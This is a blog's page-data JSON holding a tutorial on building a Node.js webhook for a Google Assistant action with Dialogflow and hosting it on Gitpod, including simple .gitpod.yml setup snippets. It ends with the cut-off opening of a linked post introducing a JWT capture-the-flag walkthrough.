{"componentChunkName":"component---src-narative-gatsby-theme-novela-templates-article-template-tsx","path":"/build-a-webhook-for-google-assistant-action","result":{"data":{"allSite":{"edges":[{"node":{"siteMetadata":{"name":"Anudeep Reddy","siteUrl":"https://anudeepsblog.netlify.com"}}}]}},"pageContext":{"isCreatedByStatefulCreatePages":false,"article":{"id":"7e2c739d-9166-5f41-be73-e40d74678404","slug":"/build-a-webhook-for-google-assistant-action","secret":false,"title":"Build a Webhook for Google Assistant Action","author":"Anudeep Reddy","date":"December 8th, 2019","dateForSEO":"2019-12-08T00:00:00.000Z","timeToRead":4,"excerpt":"First of all I would like to start this section by saying, I ❤ Gitpod","subscription":true,"body":"function _extends() { _extends = Object.assign || function (target) { for (var i = 1; i < arguments.length; i++) { var source = arguments[i]; for (var key in source) { if (Object.prototype.hasOwnProperty.call(source, key)) { target[key] = source[key]; } } } return target; }; return _extends.apply(this, arguments); }\n\nfunction _objectWithoutProperties(source, excluded) { if (source == null) return {}; var target = _objectWithoutPropertiesLoose(source, excluded); var key, i; if (Object.getOwnPropertySymbols) { var sourceSymbolKeys = Object.getOwnPropertySymbols(source); for (i = 0; i < sourceSymbolKeys.length; i++) { key = sourceSymbolKeys[i]; if (excluded.indexOf(key) >= 0) continue; if (!Object.prototype.propertyIsEnumerable.call(source, key)) continue; target[key] = source[key]; } } return target; }\n\nfunction _objectWithoutPropertiesLoose(source, excluded) { if (source == null) return {}; var target = {}; var sourceKeys = Object.keys(source); var key, i; for (i = 0; i < sourceKeys.length; i++) { key = sourceKeys[i]; if (excluded.indexOf(key) >= 0) continue; target[key] = source[key]; } return target; }\n\n/* @jsx mdx */\nvar _frontmatter = {\n  \"title\": \"Build a Webhook for Google Assistant Action\",\n  \"author\": \"Anudeep 
Reddy\",\n  \"date\": \"2019-12-08T00:00:00.000Z\",\n  \"hero\": \"./images/hero.png\",\n  \"excerpt\": \"First of all I would like to start this section by saying, I ❤ Gitpod\"\n};\n\nvar makeShortcode = function makeShortcode(name) {\n  return function MDXDefaultShortcode(props) {\n    console.warn(\"Component \" + name + \" was not imported, exported, or provided by MDXProvider as global scope\");\n    return mdx(\"div\", props);\n  };\n};\n\nvar layoutProps = {\n  _frontmatter: _frontmatter\n};\nvar MDXLayout = \"wrapper\";\nreturn function MDXContent(_ref) {\n  var components = _ref.components,\n      props = _objectWithoutProperties(_ref, [\"components\"]);\n\n  return mdx(MDXLayout, _extends({}, layoutProps, props, {\n    components: components,\n    mdxType: \"MDXLayout\"\n  }), mdx(\"p\", null, \"This post is all about how to build your webhook for your Google Assistant action and host it temporarily on Gitpod and test your code.\"), mdx(\"h2\", {\n    \"id\": \"prerequisites\"\n  }, \"Prerequisites\"), mdx(\"ul\", null, mdx(\"li\", {\n    parentName: \"ul\"\n  }, \"Node JS\"), mdx(\"li\", {\n    parentName: \"ul\"\n  }, \"Express JS\"), mdx(\"li\", {\n    parentName: \"ul\"\n  }, \"Basics on how to use Github\")), mdx(\"p\", null, \"If you have these in place, Let\\u2019s get started.\"), mdx(\"h2\", {\n    \"id\": \"what-is-gitpod\"\n  }, \"What is Gitpod?\"), mdx(\"p\", null, \"First of all I would like to start this section by saying, I \\u2764 Gitpod. Gitpod is an online IDE for Github. Gitpod provides you with a fully working development environment, including a VS Code-powered IDE and a cloud-based Linux container configured specifically for the project at hand. 
Just prefix your Github repo URL with \\u201D\", mdx(\"a\", _extends({\n    parentName: \"p\"\n  }, {\n    \"href\": \"https://gitpod.io/#%22\",\n    \"target\": \"_blank\",\n    \"rel\": \"noreferrer\"\n  }), \"https://gitpod.io/#\\u201D\"), \", So that the final link looks something like this \\u201D\", mdx(\"a\", _extends({\n    parentName: \"p\"\n  }, {\n    \"href\": \"https://gitpod.io/#https://github.com/%5Busername%5D/%5Brepo-name%5D\",\n    \"target\": \"_blank\",\n    \"rel\": \"noreferrer\"\n  }), \"https://gitpod.io/#https://github.com/[username]/[repo-name]\"), \"\\u201D or you can also use the Gitpod \", mdx(\"a\", _extends({\n    parentName: \"p\"\n  }, {\n    \"href\": \"https://chrome.google.com/webstore/detail/gitpod-online-ide/dodmmooeoklaejobgleioelladacbeki?hl=en\",\n    \"target\": \"_blank\",\n    \"rel\": \"noreferrer\"\n  }), \"browser extension\"), \" to add the Gitpod button to Github page.\"), mdx(\"iframe\", {\n    width: \"560\",\n    height: \"315\",\n    src: \"https://www.youtube.com/embed/bFZMKpDV3GQ\",\n    frameBorder: \"0\",\n    allow: \"accelerometer; autoplay; encrypted-media; gyroscope; picture-in-picture\",\n    allowFullScreen: true\n  }), mdx(\"h2\", {\n    \"id\": \"lets-start-building\"\n  }, \"Let\\u2019s start building\"), mdx(\"p\", null, \"I have created a Github repo which will help you get started without any hassle. The repo is basically a boilerplate to get started with building your webhook. The code is written in Node JS, So it would be easier for you to build on top of it if you are already familiar with Node JS. 
We will be using the \", mdx(\"a\", _extends({\n    parentName: \"p\"\n  }, {\n    \"href\": \"https://www.npmjs.com/package/actions-on-google\",\n    \"target\": \"_blank\",\n    \"rel\": \"noreferrer\"\n  }), \"action-on-google\"), \" Node JS library (This client library makes it easy to create Actions for the Google Assistant and supports Dialogflow, Actions SDK, and Smart Home fulfillment.).\"), mdx(\"h3\", {\n    \"id\": \"create-your-action\"\n  }, \"Create your Action\"), mdx(\"ul\", null, mdx(\"li\", {\n    parentName: \"ul\"\n  }, \"Head over to \", mdx(\"a\", _extends({\n    parentName: \"li\"\n  }, {\n    \"href\": \"https://console.actions.google.com/\",\n    \"target\": \"_blank\",\n    \"rel\": \"noreferrer\"\n  }), \"https://console.actions.google.com/\"), \" and click on New Project.\")), mdx(\"p\", null, mdx(\"img\", _extends({\n    parentName: \"p\"\n  }, {\n    \"src\": \"https://res-2.cloudinary.com/anudeepc/image/upload/q_auto/v1/blog-images/Annotation-2019-06-28-141627.png\",\n    \"alt\": \"Annotation-2019-06-28-141627\"\n  }))), mdx(\"ul\", null, mdx(\"li\", {\n    parentName: \"ul\"\n  }, \"Enter your project name and click on create project.\")), mdx(\"p\", null, mdx(\"img\", _extends({\n    parentName: \"p\"\n  }, {\n    \"src\": \"https://res-1.cloudinary.com/anudeepc/image/upload/q_auto/v1/blog-images/gitpod-action.png\",\n    \"alt\": \"gitpod-action\"\n  }))), mdx(\"ul\", null, mdx(\"li\", {\n    parentName: \"ul\"\n  }, \"Now select a category for your Action.\"), mdx(\"li\", {\n    parentName: \"ul\"\n  }, \"Now under the Develop menu, give your action a name.\"), mdx(\"li\", {\n    parentName: \"ul\"\n  }, \"Now head over to actions menu in Develop tab and click on \", mdx(\"strong\", {\n    parentName: \"li\"\n  }, \"Add your first action\"), \".\")), mdx(\"p\", null, mdx(\"img\", _extends({\n    parentName: \"p\"\n  }, {\n    \"src\": \"https://res-1.cloudinary.com/anudeepc/image/upload/q_auto/v1/blog-images/temp2.png\",\n    
\"alt\": \"temp2\"\n  }))), mdx(\"ul\", null, mdx(\"li\", {\n    parentName: \"ul\"\n  }, \"In the next section choose \", mdx(\"strong\", {\n    parentName: \"li\"\n  }, \"custom intent\"), \" and click on \", mdx(\"strong\", {\n    parentName: \"li\"\n  }, \"build\"), \". Doing this will redirect you to the \", mdx(\"strong\", {\n    parentName: \"li\"\n  }, \"Dialogflow console\"), \" and it should look something like this.\")), mdx(\"p\", null, mdx(\"img\", _extends({\n    parentName: \"p\"\n  }, {\n    \"src\": \"https://res-3.cloudinary.com/anudeepc/image/upload/q_auto/v1/blog-images/temp3.png\",\n    \"alt\": \"temp3\"\n  }))), mdx(\"ul\", null, mdx(\"li\", {\n    parentName: \"ul\"\n  }, \"Click on create to \", mdx(\"strong\", {\n    parentName: \"li\"\n  }, \"create\"), \" your agent on Dialogflow.\"), mdx(\"li\", {\n    parentName: \"ul\"\n  }, \"Once your agent is ready, you will already have two default Intents (Default Fallback Intent and Default Welcome Intent) in place and these two do pretty good at their job.\"), mdx(\"li\", {\n    parentName: \"ul\"\n  }, \"Now it\\u2019s time to create a new intent and enable fulfillments for that intent so that we can serve responses from the webhook that we will be building in the next section.\"), mdx(\"li\", {\n    parentName: \"ul\"\n  }, \"Click on create a new intent, give it a name and training phrase (training phrase will be used to invoke the intent). 
Now that your intent is almost ready scroll down and under fulfillments \", mdx(\"strong\", {\n    parentName: \"li\"\n  }, \"enable webhook call\"), \" for the new Default welcome intent and the new intent you just created.\")), mdx(\"h3\", {\n    \"id\": \"understanding-gitpodyml\"\n  }, \"Understanding .gitpod.yml\"), mdx(\"p\", null, \"The .gitpod.yml file is used to automate setting up the environment required to run your app.\"), mdx(\"p\", null, mdx(\"img\", _extends({\n    parentName: \"p\"\n  }, {\n    \"src\": \"https://res-5.cloudinary.com/anudeepc/image/upload/q_auto/v1/blog-images/carbon--4-.png\",\n    \"alt\": \"carbon--4-\"\n  }))), mdx(\"p\", null, \"If you want to access services running in your workspace, e.g. a development HTTP server on port 8080, you need to expose that port first. Gitpod has two means of doing that:\"), mdx(\"ol\", null, mdx(\"li\", {\n    parentName: \"ol\"\n  }, \"On-the-fly: when you start a process which listens on a port in your workspace, Gitpod will ask you if you want to expose that port to the internet. Anyone who knows the resulting URL can then reach the service, so treat a webhook exposed this way as a temporary test endpoint, not a production one.\"), mdx(\"li\", {\n    parentName: \"ol\"\n  }, \"In your configuration: if you already know that you want a particular port exposed, you can configure it in the .gitpod.yml file and skip the extra click later on. For example:\")), mdx(\"pre\", null, mdx(\"code\", _extends({\n    parentName: \"pre\"\n  }, {}), \"ports:\\n  - port: 3000\\n\")), mdx(\"p\", null, \"When starting or restarting a workspace you typically want to run certain tasks. Most probably that includes the build and maybe also running tests and automatically start the application in e.g. 
a dev server.\"), mdx(\"p\", null, \"Gitpod allows you to configure start tasks in the .gitpod.yml file.\"), mdx(\"p\", null, \"For instance, the start script for this repository is defined as:\"), mdx(\"pre\", null, mdx(\"code\", _extends({\n    parentName: \"pre\"\n  }, {}), \"tasks:\\n- init: npm install\\n  command: npm start\\n\")), mdx(\"p\", null, \"You can have multiple tasks, which are opened on separated terminals.\"), mdx(\"pre\", null, mdx(\"code\", _extends({\n    parentName: \"pre\"\n  }, {}), \"tasks:\\n- init: npm install\\n  command: npm start\\n- command: echo -e \\\"\\\\n\\\\nwebhook url - $(gp url 3000)/webhook \\\\n\\\\nCopy and paste this url in the Dialogflow console\\\"\\n\")), mdx(\"h4\", {\n    \"id\": \"init-command\"\n  }, mdx(\"inlineCode\", {\n    parentName: \"h4\"\n  }, \"init\"), \" command\"), mdx(\"p\", null, \"The init property can be used to specify shell commands that should only be executed after a workspace was freshly cloned and needs to be initialized somehow. Such tasks are usually builds or downloading dependencies. Anything you only want to do once but not when you restart a workspace or start a snapshot.\"), mdx(\"p\", null, \"In our case the \", mdx(\"inlineCode\", {\n    parentName: \"p\"\n  }, \"init\"), \" command is\"), mdx(\"pre\", null, mdx(\"code\", _extends({\n    parentName: \"pre\"\n  }, {}), \"tasks:\\n- init: npm install\\n\")), mdx(\"h3\", {\n    \"id\": \"get-the-gitpod-setup-running\"\n  }, \"Get the Gitpod setup running\"), mdx(\"ul\", null, mdx(\"li\", {\n    parentName: \"ul\"\n  }, \"Fork my \", mdx(\"a\", _extends({\n    parentName: \"li\"\n  }, {\n    \"href\": \"https://github.com/anudeepreddy/dialogflow-webhook-boilerplate-nodejs\",\n    \"target\": \"_blank\",\n    \"rel\": \"noreferrer\"\n  }), \"repo (dialogflow-webhook-boilerplate-nodejs)\"), \" \", mdx(\"strong\", {\n    parentName: \"li\"\n  }, \"or\"), \" just click on the run in gitpod button in my repo. 
(If you do this you have to fork it from the workspace so that you can commit your own changes to your repo).\"), mdx(\"li\", {\n    parentName: \"ul\"\n  }, \"Now you can just prefix your repo url with \\u201D\", mdx(\"a\", _extends({\n    parentName: \"li\"\n  }, {\n    \"href\": \"https://gitpod.io/#%22\",\n    \"target\": \"_blank\",\n    \"rel\": \"noreferrer\"\n  }), \"https://gitpod.io/#\\u201D\"), \". This should take you to Gitpod and start your workspace. The workspace take a little while to start.\"), mdx(\"li\", {\n    parentName: \"ul\"\n  }, \"Once the workspace is running you should see something like this.\")), mdx(\"p\", null, mdx(\"img\", _extends({\n    parentName: \"p\"\n  }, {\n    \"src\": \"https://res-2.cloudinary.com/anudeepc/image/upload/q_auto/v1/blog-images/Annotation-2019-06-25-171555.png\",\n    \"alt\": \"Annotation-2019-06-25-171555\"\n  }))), mdx(\"ul\", null, mdx(\"li\", {\n    parentName: \"ul\"\n  }, \"If you notice the Node app is already running in the first terminal. This is automated by a Gitpod configuration file. And the webhook URL is printed on to the second terminal. 
All the dependencies that are required are also installed while creating the workspace.\")), mdx(\"p\", null, mdx(\"img\", _extends({\n    parentName: \"p\"\n  }, {\n    \"src\": \"https://res-5.cloudinary.com/anudeepc/image/upload/q_auto/v1/blog-images/Annotation-2019-06-25-171555-crop.png\",\n    \"alt\": \"Annotation-2019-06-25-171555-crop\"\n  }))), mdx(\"ul\", null, mdx(\"li\", {\n    parentName: \"ul\"\n  }, \"Now that the webhook is running and i presume that you already have your agent on Dialogflow (If not create an agent), Next thing you need to do is to copy the webhook URL from the terminal and paste it in the Fulfillments section in the Dialogflow Console.\")), mdx(\"p\", null, mdx(\"img\", _extends({\n    parentName: \"p\"\n  }, {\n    \"src\": \"https://res-5.cloudinary.com/anudeepc/image/upload/q_auto/v1/blog-images/Annotation-2019-06-25-172359.png\",\n    \"alt\": \"Annotation-2019-06-25-172359\"\n  }))), mdx(\"ul\", null, mdx(\"li\", {\n    parentName: \"ul\"\n  }, \"Open the index.js file which contains the code for the webhook.\")), mdx(\"p\", null, mdx(\"img\", _extends({\n    parentName: \"p\"\n  }, {\n    \"src\": \"https://res-1.cloudinary.com/anudeepc/image/upload/q_auto/v1/blog-images/carbon--1-.png\",\n    \"alt\": \"carbon--1-\"\n  }))), mdx(\"p\", null, \"The file initially contains this code. 
Now lets add some more code to it to display a card when we invoke the new intent we created in the previous section.\\nactions-on-google library provides many functionalities to can simplify your task to render rich responses in your action.\"), mdx(\"p\", null, \"We will be adding the following code to display a card when the new intent is invoked.\"), mdx(\"p\", null, mdx(\"img\", _extends({\n    parentName: \"p\"\n  }, {\n    \"src\": \"https://res-1.cloudinary.com/anudeepc/image/upload/q_auto/v1/blog-images/carbon--3-.png\",\n    \"alt\": \"carbon--3-\"\n  }))), mdx(\"p\", null, \"Replace the URL\\u2019s and other contents in the code and stop the previous instance of the app from running and start it again after you have made changes to the code by running \", mdx(\"inlineCode\", {\n    parentName: \"p\"\n  }, \"npm start\"), \" in the terminal.\"), mdx(\"ul\", null, mdx(\"li\", {\n    parentName: \"ul\"\n  }, \"To test your action you can click on \", mdx(\"strong\", {\n    parentName: \"li\"\n  }, \"See how it works in Google Assistant\"), \" in the Dialogflow console.\")), mdx(\"p\", null, mdx(\"img\", _extends({\n    parentName: \"p\"\n  }, {\n    \"src\": \"https://res-3.cloudinary.com/anudeepc/image/upload/q_auto/v1/blog-images/Annotation-2019-06-28-175558.png\",\n    \"alt\": \"Annotation-2019-06-28-175558\"\n  }))), mdx(\"ul\", null, mdx(\"li\", {\n    parentName: \"ul\"\n  }, \"Invoking the intent would give you response similar to this.\")), mdx(\"p\", null, mdx(\"img\", _extends({\n    parentName: \"p\"\n  }, {\n    \"src\": \"https://res-5.cloudinary.com/anudeepc/image/upload/q_auto/v1/blog-images/Screenshot_20190628-181019.png\",\n    \"alt\": \"Screenshot_20190628-181019\"\n  }))), mdx(\"p\", null, \"Refer to the links below to add your own functionalities.\"), mdx(\"h2\", {\n    \"id\": \"links-to-refer\"\n  }, \"Links to Refer\"), mdx(\"ul\", null, mdx(\"li\", {\n    parentName: \"ul\"\n  }, \"If you would like to learn more about the 
actions-on-google library, you can find it here - \", mdx(\"a\", _extends({\n    parentName: \"li\"\n  }, {\n    \"href\": \"https://www.npmjs.com/package/actions-on-google\",\n    \"target\": \"_blank\",\n    \"rel\": \"noreferrer\"\n  }), \"https://www.npmjs.com/package/actions-on-google\")), mdx(\"li\", {\n    parentName: \"ul\"\n  }, \"Go through these examples - \", mdx(\"a\", _extends({\n    parentName: \"li\"\n  }, {\n    \"href\": \"https://developers.google.com/actions/samples/github\",\n    \"target\": \"_blank\",\n    \"rel\": \"noreferrer\"\n  }), \"https://developers.google.com/actions/samples/github\")), mdx(\"li\", {\n    parentName: \"ul\"\n  }, \"Rich responses example - \", mdx(\"a\", _extends({\n    parentName: \"li\"\n  }, {\n    \"href\": \"https://github.com/actions-on-google/dialogflow-conversation-components-nodejs\",\n    \"target\": \"_blank\",\n    \"rel\": \"noreferrer\"\n  }), \"https://github.com/actions-on-google/dialogflow-conversation-components-nodejs\"))), mdx(\"h2\", {\n    \"id\": \"conclusion\"\n  }, \"Conclusion\"), mdx(\"p\", null, \"Gitpod can make your life much simpler by automating your development setup just by adding a simple configuration file to your repo. You can refer to the Gitpod \", mdx(\"a\", _extends({\n    parentName: \"p\"\n  }, {\n    \"href\": \"https://www.gitpod.io/docs/\",\n    \"target\": \"_blank\",\n    \"rel\": \"noreferrer\"\n  }), \"Docs\"), \" to learn more about the platform. Gitpod lets you work with unlimited workspace but with 100hrs/month runtime. It also provides Personal and unlimited plans as well. 
If you are a student then you can claim Gitpod Unlimited plan for just $9.\"), mdx(\"p\", null, mdx(\"img\", _extends({\n    parentName: \"p\"\n  }, {\n    \"src\": \"https://res-3.cloudinary.com/anudeepc/image/upload/q_auto/v1/blog-images/character.gif\",\n    \"alt\": \"character\"\n  }))), mdx(\"h1\", {\n    \"id\": \"happy-coding-with-gitpod-\"\n  }, \"Happy coding with Gitpod \\u2728\"));\n}\n;\nMDXContent.isMDXComponent = true;","hero":{"full":{"base64":"data:image/png;base64,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","aspectRatio":1.7777777777777777,"src":"/static/497338b280462c13b7a6e96a9f6b3c89/f4f8c/hero.png","srcSet":"/static/497338b280462c13b7a6e96a9f6b3c89/206f6/hero.png 236w,\n/static/497338b280462c13b7a6e96a9f6b3c89/84032/hero.png 472w,\n/static/497338b280462c13b7a6e96a9f6b3c89/f4f8c/hero.png 944w,\n/static/497338b280462c13b7a6e96a9f6b3c89/513fc/hero.png 1416w,\n/static/497338b280462c13b7a6e96a9f6b3c89/6eada/hero.png 1888w,\n/static/497338b280462c13b7a6e96a9f6b3c89/ba228/hero.png 1920w","srcWebp":"/static/497338b280462c13b7a6e96a9f6b3c89/99fbb/hero.webp","srcSetWebp":"/static/497338b280462c13b7a6e96a9f6b3c89/77392/hero.webp 236w,\n/static/497338b280462c13b7a6e96a9f6b3c89/1f177/hero.webp 472w,\n/static/497338b280462c13b7a6e96a9f6b3c89/99fbb/hero.webp 944w,\n/static/497338b280462c13b7a6e96a9f6b3c89/4a492/hero.webp 1416w,\n/static/497338b280462c13b7a6e96a9f6b3c89/b0b8f/hero.webp 1888w,\n/static/497338b280462c13b7a6e96a9f6b3c89/30cf3/hero.webp 1920w","sizes":"(max-width: 944px) 100vw, 944px"},"regular":{"base64":"data:image/png;base64,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","aspectRatio":1.7777777777777777,"src":"/static/497338b280462c13b7a6e96a9f6b3c89/3e3e7/hero.png","srcSet":"/static/497338b280462c13b7a6e96a9f6b3c89/a123b/hero.png 163w,\n/static/497338b280462c13b7a6e96a9f6b3c89/b6f5d/hero.png 327w,\n/static/497338b280462c13b7a6e96a9f6b3c89/3e3e7/hero.png 653w,\n/static/497338b280462c13b7a6e96a9f6b3c89/de899/hero.png 
980w,\n/static/497338b280462c13b7a6e96a9f6b3c89/00f25/hero.png 1306w,\n/static/497338b280462c13b7a6e96a9f6b3c89/ba228/hero.png 1920w","srcWebp":"/static/497338b280462c13b7a6e96a9f6b3c89/0acdf/hero.webp","srcSetWebp":"/static/497338b280462c13b7a6e96a9f6b3c89/ac59e/hero.webp 163w,\n/static/497338b280462c13b7a6e96a9f6b3c89/7660b/hero.webp 327w,\n/static/497338b280462c13b7a6e96a9f6b3c89/0acdf/hero.webp 653w,\n/static/497338b280462c13b7a6e96a9f6b3c89/75470/hero.webp 980w,\n/static/497338b280462c13b7a6e96a9f6b3c89/68d47/hero.webp 1306w,\n/static/497338b280462c13b7a6e96a9f6b3c89/30cf3/hero.webp 1920w","sizes":"(max-width: 653px) 100vw, 653px"},"narrow":{"base64":"data:image/png;base64,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","aspectRatio":1.7777777777777777,"src":"/static/497338b280462c13b7a6e96a9f6b3c89/f156e/hero.png","srcSet":"/static/497338b280462c13b7a6e96a9f6b3c89/f2848/hero.png 114w,\n/static/497338b280462c13b7a6e96a9f6b3c89/42f31/hero.png 229w,\n/static/497338b280462c13b7a6e96a9f6b3c89/f156e/hero.png 457w,\n/static/497338b280462c13b7a6e96a9f6b3c89/cf471/hero.png 686w,\n/static/497338b280462c13b7a6e96a9f6b3c89/3bc69/hero.png 914w,\n/static/497338b280462c13b7a6e96a9f6b3c89/ba228/hero.png 1920w","srcWebp":"/static/497338b280462c13b7a6e96a9f6b3c89/15384/hero.webp","srcSetWebp":"/static/497338b280462c13b7a6e96a9f6b3c89/31fce/hero.webp 114w,\n/static/497338b280462c13b7a6e96a9f6b3c89/e3e25/hero.webp 229w,\n/static/497338b280462c13b7a6e96a9f6b3c89/15384/hero.webp 457w,\n/static/497338b280462c13b7a6e96a9f6b3c89/0258d/hero.webp 686w,\n/static/497338b280462c13b7a6e96a9f6b3c89/64ea2/hero.webp 914w,\n/static/497338b280462c13b7a6e96a9f6b3c89/30cf3/hero.webp 1920w","sizes":"(max-width: 457px) 100vw, 457px"},"seo":{"src":"/static/497338b280462c13b7a6e96a9f6b3c89/7ef28/hero.png"}}},"authors":[{"authorsPage":true,"bio":"I am an undergraduate student. I have been exploring the field of computer science for about 7 years now. 
I created this blog to\nshare my journey and things I have learnt with everyone out there.\n","id":"187d0db3-c57c-5455-ad24-678a9da5b361","name":"Anudeep Reddy","featured":true,"social":[{"url":"https://github.com/anudeepreddy"},{"url":"https://twitter.com/anudeepc85"},{"url":"https://instagram.com/anudeepc24"},{"url":"https://www.linkedin.com/in/anudeep-reddy-25332262/"}],"slug":"/authors/anudeep-reddy","avatar":{"small":{"base64":"data:image/jpeg;base64,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","aspectRatio":0.73,"src":"/static/10f09cd97c79e6c0d6a37e64b0ab7477/20b9f/anudeep-reddy.jpg","srcSet":"/static/10f09cd97c79e6c0d6a37e64b0ab7477/8de35/anudeep-reddy.jpg 13w,\n/static/10f09cd97c79e6c0d6a37e64b0ab7477/efbf2/anudeep-reddy.jpg 25w,\n/static/10f09cd97c79e6c0d6a37e64b0ab7477/20b9f/anudeep-reddy.jpg 50w,\n/static/10f09cd97c79e6c0d6a37e64b0ab7477/900f1/anudeep-reddy.jpg 75w,\n/static/10f09cd97c79e6c0d6a37e64b0ab7477/b08b0/anudeep-reddy.jpg 100w,\n/static/10f09cd97c79e6c0d6a37e64b0ab7477/19128/anudeep-reddy.jpg 438w","srcWebp":"/static/10f09cd97c79e6c0d6a37e64b0ab7477/e7b2c/anudeep-reddy.webp","srcSetWebp":"/static/10f09cd97c79e6c0d6a37e64b0ab7477/58718/anudeep-reddy.webp 13w,\n/static/10f09cd97c79e6c0d6a37e64b0ab7477/74aad/anudeep-reddy.webp 25w,\n/static/10f09cd97c79e6c0d6a37e64b0ab7477/e7b2c/anudeep-reddy.webp 50w,\n/static/10f09cd97c79e6c0d6a37e64b0ab7477/ed320/anudeep-reddy.webp 75w,\n/static/10f09cd97c79e6c0d6a37e64b0ab7477/66016/anudeep-reddy.webp 100w,\n/static/10f09cd97c79e6c0d6a37e64b0ab7477/4916f/anudeep-reddy.webp 438w","sizes":"(max-width: 50px) 100vw, 50px"},"medium":{"base64":"data:image/jpeg;base64,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","aspectRatio":0.73,"src":"/static/10f09cd97c79e6c0d6a37e64b0ab7477/b08b0/anudeep-reddy.jpg","srcSet":"/static/10f09cd97c79e6c0d6a37e64b0ab7477/efbf2/anudeep-reddy.jpg 25w,\n/static/10f09cd97c79e6c0d6a37e64b0ab7477/20b9f/anudeep-reddy.jpg 
50w,\n/static/10f09cd97c79e6c0d6a37e64b0ab7477/b08b0/anudeep-reddy.jpg 100w,\n/static/10f09cd97c79e6c0d6a37e64b0ab7477/50e4e/anudeep-reddy.jpg 150w,\n/static/10f09cd97c79e6c0d6a37e64b0ab7477/471e9/anudeep-reddy.jpg 200w,\n/static/10f09cd97c79e6c0d6a37e64b0ab7477/19128/anudeep-reddy.jpg 438w","srcWebp":"/static/10f09cd97c79e6c0d6a37e64b0ab7477/66016/anudeep-reddy.webp","srcSetWebp":"/static/10f09cd97c79e6c0d6a37e64b0ab7477/74aad/anudeep-reddy.webp 25w,\n/static/10f09cd97c79e6c0d6a37e64b0ab7477/e7b2c/anudeep-reddy.webp 50w,\n/static/10f09cd97c79e6c0d6a37e64b0ab7477/66016/anudeep-reddy.webp 100w,\n/static/10f09cd97c79e6c0d6a37e64b0ab7477/d9b14/anudeep-reddy.webp 150w,\n/static/10f09cd97c79e6c0d6a37e64b0ab7477/6b183/anudeep-reddy.webp 200w,\n/static/10f09cd97c79e6c0d6a37e64b0ab7477/4916f/anudeep-reddy.webp 438w","sizes":"(max-width: 100px) 100vw, 100px"},"large":{"base64":"data:image/jpeg;base64,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","aspectRatio":0.73,"src":"/static/10f09cd97c79e6c0d6a37e64b0ab7477/4b6ce/anudeep-reddy.jpg","srcSet":"/static/10f09cd97c79e6c0d6a37e64b0ab7477/db25d/anudeep-reddy.jpg 82w,\n/static/10f09cd97c79e6c0d6a37e64b0ab7477/ffb8a/anudeep-reddy.jpg 164w,\n/static/10f09cd97c79e6c0d6a37e64b0ab7477/4b6ce/anudeep-reddy.jpg 328w,\n/static/10f09cd97c79e6c0d6a37e64b0ab7477/19128/anudeep-reddy.jpg 438w","srcWebp":"/static/10f09cd97c79e6c0d6a37e64b0ab7477/5a48e/anudeep-reddy.webp","srcSetWebp":"/static/10f09cd97c79e6c0d6a37e64b0ab7477/2d087/anudeep-reddy.webp 82w,\n/static/10f09cd97c79e6c0d6a37e64b0ab7477/29d87/anudeep-reddy.webp 164w,\n/static/10f09cd97c79e6c0d6a37e64b0ab7477/5a48e/anudeep-reddy.webp 328w,\n/static/10f09cd97c79e6c0d6a37e64b0ab7477/4916f/anudeep-reddy.webp 438w","sizes":"(max-width: 328px) 100vw, 328px"}}}],"basePath":"/","slug":"/build-a-webhook-for-google-assistant-action","id":"7e2c739d-9166-5f41-be73-e40d74678404","title":"Build a Webhook for Google Assistant 
Action","mailchimp":true,"next":[{"id":"1c9b7ba4-600d-5e04-b757-367134cc1da8","slug":"/ctf-live-secret-in-claim","secret":false,"title":"CTF.live - Secret in Claim","author":"Anudeep Reddy","date":"August 3rd, 2020","dateForSEO":"2020-08-03T00:00:00.000Z","timeToRead":3,"excerpt":"This post is a walkthrough of a lab from ctflive.","subscription":true,"body":"function _extends() { _extends = Object.assign || function (target) { for (var i = 1; i < arguments.length; i++) { var source = arguments[i]; for (var key in source) { if (Object.prototype.hasOwnProperty.call(source, key)) { target[key] = source[key]; } } } return target; }; return _extends.apply(this, arguments); }\n\nfunction _objectWithoutProperties(source, excluded) { if (source == null) return {}; var target = _objectWithoutPropertiesLoose(source, excluded); var key, i; if (Object.getOwnPropertySymbols) { var sourceSymbolKeys = Object.getOwnPropertySymbols(source); for (i = 0; i < sourceSymbolKeys.length; i++) { key = sourceSymbolKeys[i]; if (excluded.indexOf(key) >= 0) continue; if (!Object.prototype.propertyIsEnumerable.call(source, key)) continue; target[key] = source[key]; } } return target; }\n\nfunction _objectWithoutPropertiesLoose(source, excluded) { if (source == null) return {}; var target = {}; var sourceKeys = Object.keys(source); var key, i; for (i = 0; i < sourceKeys.length; i++) { key = sourceKeys[i]; if (excluded.indexOf(key) >= 0) continue; target[key] = source[key]; } return target; }\n\n/* @jsx mdx */\nvar _frontmatter = {\n  \"title\": \"CTF.live - Secret in Claim\",\n  \"author\": \"Anudeep Reddy\",\n  \"date\": \"2020-08-03T00:00:00.000Z\",\n  \"hero\": \"./images/hero.png\",\n  \"excerpt\": \"This post is a walkthrough of a lab from ctflive.\"\n};\n\nvar makeShortcode = function makeShortcode(name) {\n  return function MDXDefaultShortcode(props) {\n    console.warn(\"Component \" + name + \" was not imported, exported, or provided by MDXProvider as global scope\");\n    return 
mdx(\"div\", props);\n  };\n};\n\nvar layoutProps = {\n  _frontmatter: _frontmatter\n};\nvar MDXLayout = \"wrapper\";\nreturn function MDXContent(_ref) {\n  var components = _ref.components,\n      props = _objectWithoutProperties(_ref, [\"components\"]);\n\n  return mdx(MDXLayout, _extends({}, layoutProps, props, {\n    components: components,\n    mdxType: \"MDXLayout\"\n  }), mdx(\"p\", null, \"This post is a walkthrough of a lab from \", mdx(\"a\", _extends({\n    parentName: \"p\"\n  }, {\n    \"href\": \"https://ctf.live\",\n    \"target\": \"_blank\",\n    \"rel\": \"noreferrer\"\n  }), \"ctflive\"), \". You can find this lab \", mdx(\"a\", _extends({\n    parentName: \"p\"\n  }, {\n    \"href\": \"https://www.ctf.live/challengedetails?cid=47\",\n    \"target\": \"_blank\",\n    \"rel\": \"noreferrer\"\n  }), \"here\"), \", First give it a try yourself before going through this post. It\\u2019s a JWT based challenge. For those of you who don\\u2019t know what a JWT is. don\\u2019t worry there will be a short introduction about that in this post.\"), mdx(\"h1\", {\n    \"id\": \"what-is-jwt\"\n  }, \"What is JWT\\uD83E\\uDD14?\"), mdx(\"p\", null, \"JSON Web Tokens are an open, industry standard RFC 7519 method for representing claims securely between two parties. (source: \", mdx(\"a\", _extends({\n    parentName: \"p\"\n  }, {\n    \"href\": \"https://jwt.io\",\n    \"target\": \"_blank\",\n    \"rel\": \"noreferrer\"\n  }), \"https://jwt.io\"), \"). What does this even mean\\uD83E\\uDD37\\u200D\\u2640\\uFE0F?. \"), mdx(\"p\", null, \"Let us have a look at one of the best explanations 